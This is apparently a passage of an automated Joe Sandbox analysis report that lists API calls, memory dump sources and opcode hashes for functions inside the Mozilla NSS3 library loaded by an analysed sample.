                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB0ED38
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CB0ED52
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB0ED83
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB0ED95
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB0ED9D
                                                                                                                                                                                                                • Part of subcall function 6CB264F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CB2127C,00000000,00000000,00000000), ref: 6CB2650E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                                                                                              • Opcode ID: e52d6ed5bcab72ca0f3c17afa09a2247fbac206708b53873083706f695a3fc1a
                                                                                                                                                                                                              • Instruction ID: 88131deaf0ab0d689c4f69ca73f2b7396329a9e4f6cd94666559f43d3cc59c5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e52d6ed5bcab72ca0f3c17afa09a2247fbac206708b53873083706f695a3fc1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72116A76A002E46BE7105725AC44BBF7678FF0171CF090624E8E872E50FB29A50CC6E7
                                                                                                                                                                                                              Function 6CBD0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Aborting,?,6CAB2357), ref: 6CBD0EB8
                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CAB2357), ref: 6CBD0EC0
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBD0EE6
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_Now.NSS3 ref: 6CBD0A22
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBD0A35
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBD0A66
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_GetCurrentThread.NSS3 ref: 6CBD0A70
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBD0A9D
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBD0AC8
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBD0AE8
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBD0B19
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBD0B48
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBD0C76
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_LogFlush.NSS3 ref: 6CBD0C7E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBD0EFA
                                                                                                                                                                                                                • Part of subcall function 6CABAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CABAF0E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F16
                                                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F1C
                                                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F25
                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                              • API String ID: 3905088656-1374795319
                                                                                                                                                                                                              • Opcode ID: d192ada5577f0e50a6dbffe3df905f9c07861c397e7981c195307427e13c0b08
                                                                                                                                                                                                              • Instruction ID: 106c52fcfe55d2ff46c28181e8dea3e6d32ab1574ed8989cf380dd94061579f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d192ada5577f0e50a6dbffe3df905f9c07861c397e7981c195307427e13c0b08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ABF0C8B59001147BDE003B61DC4BC9F3E3DEF42674F004034FD0956B02EA36E95496B2
                                                                                                                                                                                                              Function 6CB34DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6CB34DCB
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CB34DE1
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CB34DFF
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB34E59
                                                                                                                                                                                                                • Part of subcall function 6CB1FAB0: free.MOZGLUE(?,-00000001,?,?,6CABF673,00000000,00000000), ref: 6CB1FAC7
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBF300C,00000000), ref: 6CB34EB8
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CB34EFF
                                                                                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CB34F56
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB3521A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1025791883-0
                                                                                                                                                                                                              • Opcode ID: 88a3c9f4a34e070204b4607ec2ab2e86bcc36915934771468c92024b348b3de0
                                                                                                                                                                                                              • Instruction ID: 0bfaf4bbb915dbfd24a2eaf962588ea16e36457d2a13978107360a93af37ff59
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88a3c9f4a34e070204b4607ec2ab2e86bcc36915934771468c92024b348b3de0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF19C71E00259CBDB08CF58D8407AEBBB2FF44358F254169E819AB780E736E985CF91
                                                                                                                                                                                                              Function 6CB30C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6CB32C2A), ref: 6CB30C81
                                                                                                                                                                                                                • Part of subcall function 6CB1BE30: SECOID_FindOID_Util.NSS3(6CAD311B,00000000,?,6CAD311B,?), ref: 6CB1BE44
                                                                                                                                                                                                                • Part of subcall function 6CB08500: SECOID_GetAlgorithmTag_Util.NSS3(6CB095DC,00000000,00000000,00000000,?,6CB095DC,00000000,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CB08517
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB30CC4
                                                                                                                                                                                                                • Part of subcall function 6CB1FAB0: free.MOZGLUE(?,-00000001,?,?,6CABF673,00000000,00000000), ref: 6CB1FAC7
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB30CD5
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CB30D1D
                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CB30D3B
                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CB30D7D
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB30DB5
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB30DC1
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB30DF7
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB30E05
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB30E0F
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CB095E0
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CB095F5
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CB09609
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB0961D
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_GetInternalSlot.NSS3 ref: 6CB0970B
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB09756
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_GetIVLength.NSS3(?), ref: 6CB09767
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB0977E
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB0978E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3136566230-0
                                                                                                                                                                                                              • Opcode ID: 79e264dc716c52849ffa5a9d53f2f60805e75389e989859b8c2da794b51be01e
                                                                                                                                                                                                              • Instruction ID: 97dfaa536aa659f7b6ed334e4a320f735adb15f0b1751166b9d824d06c56121b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79e264dc716c52849ffa5a9d53f2f60805e75389e989859b8c2da794b51be01e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B741B3B19012A5ABEB019F65EC45BAF7AB4EF4430CF100024ED1957B41EB35EA58CBE2
                                                                                                                                                                                                              Function 6CADFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CADFCBD
                                                                                                                                                                                                              • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CADFCCC
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CADFCEF
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CADFD32
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CADFD46
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000001), ref: 6CADFD51
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CADFD6D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CADFD84
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                              • API String ID: 183580322-336475711
                                                                                                                                                                                                              • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                              • Instruction ID: f1fcf79f773b74f635fe2d7646853e999ee332332fc7ab88520aadf41f765eb6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31C2B69012559BEB008EA4EC057AFB7A8AF5435CF1A0129DC54A7B00E771F958C7D2
                                                                                                                                                                                                              Function 6CAC6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6CAC7D8F,6CAC7D8F,?,?), ref: 6CAC6DC8
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB1FE08
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB1FE1D
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB1FE62
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CAC7D8F,?,?), ref: 6CAC6DD5
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBE8FA0,00000000,?,?,?,?,6CAC7D8F,?,?), ref: 6CAC6DF7
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAC6E35
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB1FE29
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB1FE3D
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CB1FE6F
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CAC6E4C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBE8FE0,00000000), ref: 6CAC6E82
                                                                                                                                                                                                                • Part of subcall function 6CAC6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CACB21D,00000000,00000000,6CACB219,?,6CAC6BFB,00000000,?,00000000,00000000,?,?,?,6CACB21D), ref: 6CAC6B01
                                                                                                                                                                                                                • Part of subcall function 6CAC6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CAC6B8A
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAC6F1E
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CAC6F35
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBE8FE0,00000000), ref: 6CAC6F6B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6CAC7D8F,?,?), ref: 6CAC6FE1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 587344769-0
                                                                                                                                                                                                              • Opcode ID: 2e147ccc7ed977c3a038537d0f58f7fe1ba0760ed6dd0f668b34b7c14047f90d
                                                                                                                                                                                                              • Instruction ID: 6ac13b192da0860dd5b27d5a3ec58a4d7faf3f02024d017bedae874427563441
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e147ccc7ed977c3a038537d0f58f7fe1ba0760ed6dd0f668b34b7c14047f90d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95716F71E146869FDB00CF15CD40ABAB7A4BF58348F194229E818D7B11E771EAD4CBD1
                                                                                                                                                                                                              Function 6CB0ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE10
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE24
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,6CAED079,00000000,00000001), ref: 6CB0AE5A
                                                                                                                                                                                                              • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE6F
                                                                                                                                                                                                              • free.MOZGLUE(85145F8B,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE7F
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEB1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEC9
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEF1
                                                                                                                                                                                                              • free.MOZGLUE(6CAECDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAECDBB,?), ref: 6CB0AF0B
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AF30
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
